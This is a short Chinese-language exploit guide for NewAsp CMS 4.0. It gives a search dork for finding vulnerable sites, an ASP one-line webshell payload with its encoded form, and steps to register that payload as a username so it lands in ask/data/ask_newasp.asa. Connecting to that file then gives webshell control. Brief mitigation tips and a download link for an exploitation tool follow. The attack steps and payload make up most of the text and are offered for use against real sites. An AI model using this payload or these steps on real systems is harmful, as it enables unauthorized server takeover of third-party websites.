概述：

          由于新云4.0對(duì)注冊(cè)用戶未過濾特殊字符， 造成黑客通過腳本編碼轉(zhuǎn)換將一句話木馬寫入數(shù)據(jù)庫文件， 從而獲得WEBSHELL權(quán)限。

測(cè)試：

   1. 打開www.google.cn   搜索關(guān)鍵字:Powered By NewAsp CMS Version 4.0 或 新云問吧

   2. 將<%execute request("a")%> 編碼轉(zhuǎn)換為 ┼攠數(shù)畣整爠煥敵瑳∨≡┩愾

   3. 以┼攠數(shù)畣整爠煥敵瑳∨≡┩愾   為用戶名注冊(cè)帳戶

   4. 用一句話連接端連接 目標(biāo)站點(diǎn)url/ask/data/ask_newasp.asa ,密碼為 a

   5.上傳腳本大馬或者執(zhí)行其它操作， 這里WEBSHELL權(quán)限已經(jīng)獲得。

預(yù)防：

    1.嚴(yán)格過濾注冊(cè)用戶名， 限制注冊(cè)用戶名長(zhǎng)度及禁止特殊符號(hào)。

    2.更改ask/data/ask_newasp.asa 路徑及名稱。

    3.給文件夾做權(quán)限設(shè)置， 去除公共寫入權(quán)限。

附工具：

新云最新Oday利用工具 1010

下載地址：http://www.arpun.com/soft/3392.html